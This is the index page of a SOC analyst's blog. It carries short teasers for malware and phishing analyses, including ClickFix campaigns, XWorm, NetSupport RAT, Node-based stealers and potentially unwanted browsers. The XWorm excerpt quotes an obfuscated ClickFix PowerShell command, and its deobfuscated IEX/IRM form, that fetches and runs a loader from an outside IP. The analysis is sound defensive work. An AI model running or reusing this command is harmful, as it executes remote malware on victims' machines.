====================
== Alert Overload ==
====================
Tales from a SOC analyst

AceLauncher


AceLauncher is a Potentially Unwanted Program (PUP) similar to Wave Browser, OneStart, and OneLaunch. It’s a Chromium-based browser that creates several scheduled tasks, AppData directories, and registry keys to maintain persistence on a device. While not overtly malicious, users will likely want to remove the browser, as it redirects and serves potentially malicious content. This includes functions that link to ManualsLib domains and references to Wave Browser and Recipe Lister. The browser also uses Yahoo’s Hosted Search platform to serve sponsored content, driving revenue to the AceLauncher organization.

Read more...

Phishing


I recently analyzed the following phishing email. It contains a Microsoft account harvester and has some interesting anti-analysis functions. I didn’t do a full dive on it, but there’s some interesting stuff here.


Examining the email in a text editor revealed that the headers had been manipulated.

The QR code image was extracted from the email from its Base64-encoded string object. This was loaded into CyberChef for rasterization and analysis.

Read more...

LogMeIn Unattended Installer


A user received a phishing email that redirected them to hxxps[://]popthecard[.]pages[.]dev. This page claimed that a friend had sent an invitation, and that the user must download and open it on a Windows laptop or desktop to view it. The page automatically downloaded the file VelvetPaperCo.exe (in similar incidents, invitation.exe).


The page itself is rather basic, with the following JavaScript code handling the download function. It simply sets a timeout and then executes a function that reaches out to a public Cloudflare R2 bucket hosting the malicious RMM installer.

Read more...

Fisher-Price Malware


With the rise of AI, Vibe-Coded malware is now an existing threat. Sort of? In the way that a wet noodle could potentially kill you in the right circumstances, Vibe-Coded malware could also pose a threat. It’s just very unlikely. At least, with the current iterations out there.

Enter what I’m calling “Baby’s first malware”, AKA “Fisher-Price Malware”: a Vibe-Coded sample found on a user’s device. It’s an “obfuscated” PowerShell loader that pulls a payload that… takes screenshots and uploads them? Kind of? Technically, it works. Sometimes. In perfect conditions.

Read more...

BSides TC Talk: Click, Paste, Compromise: Unpacking ClickFix

Slides from BSides TC 2025 talk.

Direct Link

Node Malware / EvilAI

Node Malware

Node.js is commonly used to deploy stealers on devices. Often, these incidents involve WebView2 applications bundled into InnoSetup installers. These installers use custom scheduled task XML configurations to deploy tasks that run malicious Node.js scripts on the host device. Also referred to as EvilAI by Trend Micro.

The linked article does a great job of breaking these down. They’re essentially .NET assemblies that use WebView2 and AI-generated “web applications” (read: vibe-coded HTML pages). These applications are bundled into an InnoSetup installer together with Node and a malicious script. When the installer runs, it sets up a scheduled task to execute the Node script. The user only sees the intended “legitimate” AI web app get installed.

Read more...

ClickFix - NetSupport RAT


Incident Overview

On Saturday, September 20th, 2025, a user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign utilized a dynamic ClickFix template that builds legitimate-appearing captcha turnstiles based on passed parameters. This specific ClickFix template has been covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also a part of the kit, but some minor changes have occurred between the previous incidents and this current campaign.

Read more...

Abusing homoglyphs to evade detection

Calendaromatic and Homoglyphs

I came across an interesting program yesterday. A user had downloaded a “calendar” application that our EDR product had flagged. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.

The binary came as a 7-Zip Self-Extracting Executable. Extracting it revealed it was a NeutralinoJS application. NeutralinoJS is a replacement/alternative to Electron. It combines HTML, CSS, and JavaScript into a single WebView2-based desktop application. It also packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can easily view the source code for any NeutralinoJS application without much work.

Read more...

XWorm

ClickFix - XWorm

NOTE: Quick and dirty upload of some notes from an XWorm sample.

Technical Analysis

The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.


The ClickFix domain copied the following code to the user’s clipboard:

POWERSHELL "FUNCTION YES { &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];$SS=$FF[8]+$FF[6]+$FF[19]; YES"

# Deobfuscated

FUNCTION YES { 
    &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) # 77.83.207.225/x.jpg
};

$FF='HSJDUFERIKFOLDJRKMOXSDH';

$DD=$FF[8]+$FF[7]+$FF[17]; #IRM

$SS=$FF[8]+$FF[6]+$FF[19]; #IEX

# IEX (IRM 77.83.207.225/x.jpg)

The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from the 77[.]83[.]207[.]225 address. Analysis of this address located it in Moscow, Russia.

Read more...

WSL Shenanigans


A fun thing about WSL 2 is that it is fully capable of calling Windows native functions and binaries. It also has cron, which opens the opportunity to do some interesting things to someone’s unattended device.

Take this MSHTA execution for example. It’s a simple SAPI call made in JavaScript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straightforward way to do this.

Read more...